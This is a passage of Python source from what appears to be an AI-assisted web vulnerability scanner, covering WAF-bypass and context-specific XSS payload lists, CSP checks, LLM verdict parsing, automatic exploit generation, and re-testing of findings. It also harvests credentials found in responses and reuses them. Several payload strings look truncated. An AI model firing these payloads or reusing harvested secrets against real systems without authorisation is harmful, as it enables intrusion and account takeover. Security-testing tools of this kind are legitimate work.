await self.log("info", " Testing WAF bypass techniques...")
bypass_payloads = [
"", # Original
"ipt>alert(1)", # Nested
"
", # Event handler
"</script>", # Double encoding
"%3Cscript%3Ealert(1)%3C/script%3E", # URL encoded
]
for endpoint in [self.target]:
for payload in bypass_payloads:
try:
test_url = f"{endpoint}?test={payload}"
async with self.session.get(test_url) as resp:
if resp.status == 403:
await self.log("debug", f" WAF blocked: {payload[:30]}")
elif resp.status == 200:
body = await resp.text()
if payload in body or "alert(1)" in body:
await self.log("warning", f" [POTENTIAL] WAF bypass: {payload[:30]}")
except:
pass
async def _test_csp_bypass_fallback(self):
"""Test for CSP bypass without LLM"""
await self.log("info", " Testing CSP bypass...")
try:
async with self.session.get(self.target) as resp:
csp = resp.headers.get("Content-Security-Policy", "")
if not csp:
await self.log("warning", " No CSP header found")
return
# Check for weak CSP
weaknesses = []
if "unsafe-inline" in csp:
weaknesses.append("unsafe-inline allows inline scripts")
if "unsafe-eval" in csp:
weaknesses.append("unsafe-eval allows eval()")
if "*" in csp:
weaknesses.append("Wildcard (*) in CSP is too permissive")
if "data:" in csp:
weaknesses.append("data: URI scheme can be abused")
if weaknesses:
finding = Finding(
id=hashlib.md5(f"csp{self.target}".encode()).hexdigest()[:8],
title="Weak Content Security Policy",
severity="medium",
vulnerability_type="csp_bypass",
cvss_score=4.0,
cwe_id="CWE-693",
description=f"CSP has weaknesses: {'; '.join(weaknesses)}",
affected_endpoint=self.target,
evidence=f"CSP: {csp[:500]}",
remediation="Remove unsafe-inline, unsafe-eval, wildcards, and data: from CSP.",
ai_verified=False
)
await self._add_finding(finding)
await self.log("warning", f" [FOUND] Weak CSP: {', '.join(weaknesses)}")
except:
pass
async def _ai_test_vulnerability(self, vuln_type: str):
"""Wrapper for backwards compatibility - now uses AI dynamic test"""
await self._ai_dynamic_test(vuln_type)
async def _execute_ai_test(self, test: Dict, vuln_type: str):
"""Execute an AI-generated test"""
if not self.session:
return
try:
url = test.get("url", self.target)
method = test.get("method", "GET").upper()
headers = test.get("headers", {})
params = test.get("params", {})
check = test.get("check", "")
if method == "GET":
async with self.session.get(url, params=params, headers=headers) as resp:
body = await resp.text()
response_headers = dict(resp.headers)
else:
async with self.session.post(url, data=params, headers=headers) as resp:
body = await resp.text()
response_headers = dict(resp.headers)
# Use AI to analyze if vulnerability exists
if self.llm.is_available() and check:
# RAG: Get reasoning context for better AI analysis
rag_testing_ctx = self._get_rag_testing_context(vuln_type, url) if (self.rag_engine or self.few_shot_selector) else ""
# Playbook methodology context for this vuln type
pb_ctx = getattr(self, '_current_playbook_context', '') or ''
analysis_prompt = f"""Analyze this response for {vuln_type} vulnerability.
Check for: {check}
Response status: {resp.status}
Response headers: {dict(list(response_headers.items())[:10])}
Response body (first 1000 chars): {body[:1000]}
{rag_testing_ctx}{pb_ctx}
Is this vulnerable? Respond with:
VULNERABLE:
or
NOT_VULNERABLE: """
result = await self.llm.generate(analysis_prompt, self._get_enhanced_system_prompt("verification"))
if "VULNERABLE:" in result.upper():
evidence = result.split(":", 1)[1].strip() if ":" in result else result
# Anti-hallucination: verify AI evidence in actual response
if not self._evidence_in_response(evidence, body):
await self.log("debug", f" [REJECTED] AI evidence not grounded in response for {vuln_type}")
return
mapped = self._map_vuln_type(vuln_type)
finding = Finding(
id=hashlib.md5(f"{vuln_type}{url}ai".encode()).hexdigest()[:8],
title=self.vuln_registry.get_title(mapped) or f"AI-Detected {vuln_type.title()} Vulnerability",
severity=self._get_severity(vuln_type),
vulnerability_type=vuln_type,
cvss_score=self._get_cvss_score(vuln_type),
cvss_vector=self._get_cvss_vector(vuln_type),
cwe_id=self.vuln_registry.get_cwe_id(mapped) or "",
description=self.vuln_registry.get_description(mapped) or f"AI analysis detected potential {vuln_type} vulnerability.",
affected_endpoint=url,
evidence=evidence[:500],
remediation=self.vuln_registry.get_remediation(mapped) or f"Review and remediate the {vuln_type} vulnerability.",
ai_verified=True
)
await self._add_finding(finding)
await self.log("warning", f" [AI FOUND] {vuln_type} at {url[:50]}")
except Exception as e:
await self.log("debug", f" AI test execution error: {e}")
async def _test_single_param(self, base_url: str, param: str, payload: str, vuln_type: str):
"""Test a single parameter with a payload"""
if not self.session:
return
try:
# Build test URL
parsed = urlparse(base_url)
base = f"{parsed.scheme}://{parsed.netloc}{parsed.path}"
test_url = f"{base}?{param}={payload}"
async with self.session.get(test_url) as resp:
body = await resp.text()
response_data = {
"status": resp.status,
"body": body,
"headers": dict(resp.headers),
"url": str(resp.url),
"method": "GET",
"content_type": resp.headers.get("Content-Type", "")
}
is_vuln, evidence = await self._verify_vulnerability(vuln_type, payload, response_data)
if is_vuln:
await self.log("warning", f" [POTENTIAL] {vuln_type.upper()} found in {param}")
# Run through ValidationJudge pipeline
finding = await self._judge_finding(
vuln_type, test_url, param, payload, evidence, response_data
)
if finding:
await self._add_finding(finding)
except Exception as e:
await self.log("debug", f" Test error: {e}")
async def log_script(self, level: str, message: str):
"""Log a script/tool message"""
await self.log(level, message)
async def log_llm(self, level: str, message: str):
"""Log an LLM/AI message - prefixed with [AI] or [LLM]"""
if not message.startswith('[AI]') and not message.startswith('[LLM]'):
message = f"[AI] {message}"
await self.log(level, message)
async def _add_finding(self, finding: Finding):
"""Add a finding through memory (dedup + bounded + evidence check)"""
added = self.memory.add_finding(finding)
if not added:
reason = "duplicate" if self.memory.has_finding_for(
finding.vulnerability_type, finding.affected_endpoint, finding.parameter
) else "rejected by memory (missing evidence, speculative, or at capacity)"
await self.log("info", f" [SKIP] {finding.title} - {reason}")
return
await self.log("warning", f" [FOUND] {finding.title} - {finding.severity}")
# AI exploitation validation
try:
validation = await self._ai_validate_exploitation(asdict(finding))
if validation:
if validation.get("false_positive_risk") in ("medium", "high"):
await self.log("warning", f" [AI] False positive risk: {validation['false_positive_risk']} for {finding.title}")
if validation.get("exploitation_notes"):
finding.evidence = f"{finding.evidence or ''} | [AI Validation] {validation['exploitation_notes']}"
await self.log("info", f" [AI] Exploitation notes: {validation['exploitation_notes'][:100]}")
except Exception:
pass
# Generate PoC code — prefer exploit_generator (AI-enhanced), fallback to poc_generator
if not finding.poc_code:
poc_generated = False
if self.exploit_generator and self.llm.is_available():
try:
exploit_result = await self.exploit_generator.generate(
finding, self.recon, self.llm, self.token_budget,
waf_detected=bool(self._waf_result and self._waf_result.detected_wafs),
)
if exploit_result and getattr(exploit_result, "poc_code", ""):
finding.poc_code = exploit_result.poc_code
poc_generated = True
except Exception:
pass
if not poc_generated:
try:
finding.poc_code = self.poc_generator.generate(
finding.vulnerability_type,
finding.affected_endpoint,
finding.parameter,
finding.payload,
finding.evidence,
method=finding.request.split()[0] if finding.request else "GET"
)
except Exception:
pass
# Validate the generated PoC by replaying it
if finding.poc_code and self.poc_validator_engine:
try:
validation = await self.poc_validator_engine.validate(
finding.poc_code, finding, self.request_engine
)
if validation and hasattr(validation, "valid"):
if not validation.valid:
await self.log("debug", f" [POC] Validation failed: {validation.actual_result}")
except Exception:
pass
# Record success in execution history for cross-scan learning
if self.execution_history:
try:
self.execution_history.record(
self.recon.technologies,
finding.vulnerability_type,
finding.affected_endpoint,
True,
finding.evidence or ""
)
except Exception:
pass
# RAG: Record reasoning trace for future retrieval (pseudo-fine-tuning)
if self.reasoning_memory and HAS_RAG:
try:
trace = ReasoningTrace(
vuln_type=finding.vulnerability_type,
technology=", ".join(self.recon.technologies[:3]) if self.recon.technologies else "unknown",
endpoint_pattern=self._normalize_endpoint_for_rag(finding.affected_endpoint),
parameter=finding.parameter or "",
reasoning_steps=[
f"Tested {finding.vulnerability_type} on {finding.affected_endpoint}",
f"Parameter: {finding.parameter or 'N/A'}",
f"Payload: {finding.payload or 'N/A'}",
f"Evidence: {(finding.evidence or '')[:200]}",
f"Confidence: {getattr(finding, 'confidence_score', 'N/A')}",
],
payload_used=finding.payload or "",
evidence_summary=(finding.evidence or "")[:300],
confidence=getattr(finding, 'confidence_score', 80) / 100.0,
scan_target=self.target
)
self.reasoning_memory.record_success(trace)
# Also index in RAG engine for semantic retrieval
if self.rag_engine:
self.rag_engine.index_reasoning_trace(asdict(trace))
except Exception:
pass
# Capture screenshot for the confirmed finding
await self._capture_finding_screenshot(finding)
# Chain engine: derive new targets from this finding
if self.chain_engine:
try:
derived = await self.chain_engine.on_finding(finding, self.recon, self.memory)
if derived:
await self.log("info", f" [CHAIN] {len(derived)} derived targets from {finding.vulnerability_type}")
for chain_target in derived[:5]: # Limit to 5 derived targets per finding
await self.log("info", f" [CHAIN] Testing {chain_target.vuln_type} → {chain_target.url[:50]}")
try:
chain_finding = await self._test_vulnerability_type(
chain_target.url,
chain_target.vuln_type,
"GET",
[chain_target.param] if chain_target.param else ["id"]
)
if chain_finding:
chain_finding.evidence = f"{chain_finding.evidence or ''} [CHAIN from {finding.id}: {finding.vulnerability_type}]"
await self._add_finding(chain_finding)
except Exception as e:
await self.log("debug", f" [CHAIN] Test failed: {e}")
except Exception as e:
await self.log("debug", f" [CHAIN] Engine error: {e}")
# Strategy propagation: generate related test tasks from finding patterns
if self.strategy:
try:
propagated = self.strategy.propagate_finding_pattern(
finding, self.recon.endpoints
)
if propagated:
await self.log("info", f" [STRATEGY] Propagated {len(propagated)} "
f"related test targets from {finding.vulnerability_type}")
# Queue propagated targets into endpoint queue if available
if hasattr(self, '_endpoint_queue'):
for task in propagated[:10]:
await self._endpoint_queue.put({"url": task["url"]})
except Exception as e:
await self.log("debug", f" [STRATEGY] Propagation error: {e}")
# Reasoning engine: reflect on confirmed finding for strategy adaptation
if self.reasoning_engine:
try:
reflection = await self.reasoning_engine.reflect(
action_taken=f"confirmed_{finding.vulnerability_type}",
result_observed={
"endpoint": finding.affected_endpoint,
"param": finding.parameter or "",
"severity": finding.severity,
"vuln_type": finding.vulnerability_type,
}
)
if reflection and reflection.learned_pattern:
await self.log("info", f" [REASONING] Learned: {reflection.learned_pattern}")
except Exception:
pass
# Feed discovered credentials to auth manager
if self.auth_manager and finding.vulnerability_type in (
"information_disclosure", "api_key_exposure", "default_credentials",
"weak_password", "hardcoded_secrets"
):
try:
cred_pattern = re.findall(
r'(?:password|passwd|pwd|pass|api_key|apikey|token|secret)[=:"\s]+([^\s"\'&,;]{4,})',
finding.evidence or "", re.IGNORECASE
)
for cred_val in cred_pattern[:3]:
self.auth_manager.add_credentials(
username="discovered", password=cred_val,
role="user", source="discovered"
)
await self.log("info", f" [AUTH] Discovered credential fed to auth manager")
except Exception:
pass
if self.finding_callback:
try:
await self.finding_callback(asdict(finding))
except Exception as e:
print(f"Finding callback error: {e}")
async def _double_check_findings(self):
"""Re-validate all confirmed findings by re-sending payloads.
Uses a different validation approach than the original test:
- Re-sends the exact payload and verifies the response
- Compares with a benign request (negative control)
- Downgrades findings that fail re-validation
"""
if not self.findings:
return
await self.log("info", f" Double-checking {len(self.findings)} findings...")
demoted = 0
for i, finding in enumerate(list(self.findings)):
if self.is_cancelled():
break
endpoint = finding.affected_endpoint
payload = finding.payload
param = finding.parameter
if not endpoint or not payload:
finding.evidence = (finding.evidence or "") + " [DOUBLE-CHECK: skipped (no payload)]"
continue
try:
# 1. Re-send the attack payload
method = "GET"
if finding.request:
parts = finding.request.split()
if parts:
method = parts[0].upper()
attack_resp = await self._make_request(
endpoint, method=method,
params={param: payload} if method == "GET" and param else None,
data={param: payload} if method == "POST" and param else None,
)
# 2. Send benign value for comparison
benign_resp = await self._make_request(
endpoint, method=method,
params={param: "test123"} if method == "GET" and param else None,
data={param: "test123"} if method == "POST" and param else None,
)
if not attack_resp:
finding.evidence = (finding.evidence or "") + " [DOUBLE-CHECK: no response]"
continue
attack_status = attack_resp.get("status", 0)
attack_body = attack_resp.get("body", "")
benign_status = benign_resp.get("status", 0) if benign_resp else 0
benign_body = benign_resp.get("body", "") if benign_resp else ""
# Check if payload is still reflected/executed
still_valid = False
# Check payload reflection
if payload in attack_body and payload not in benign_body:
still_valid = True
# Check for vulnerability-specific markers
vuln_type = finding.vulnerability_type
if vuln_type in ("sqli_error", "sqli_union", "sqli_blind"):
sql_markers = ["sql", "syntax", "mysql", "postgresql", "sqlite", "oracle", "mssql"]
if any(m in attack_body.lower() for m in sql_markers):
still_valid = True
elif vuln_type == "command_injection":
if any(m in attack_body for m in ["uid=", "root:", "www-data", "bin/"]):
still_valid = True
elif vuln_type == "ssti":
# Check for evaluated expressions
if "49" in attack_body and "49" not in benign_body:
still_valid = True
elif vuln_type in ("xss_reflected", "xss_stored"):
if "",
f"
",
])
if context == "js_template_literal":
payloads.extend(["${alert(1)}", "${alert(document.domain)}"])
if context == "href":
payloads.extend([
"javascript:alert(1)",
"javascript:alert(document.domain)",
"javascript:alert(1)",
])
if context in ("textarea", "title"):
tag = "textarea" if context == "textarea" else "title"
payloads.extend([
f"{tag}>",
f"{tag}>
",
])
if context == "attribute_double":
payloads.extend(['" onfocus=alert(1) autofocus x="', '">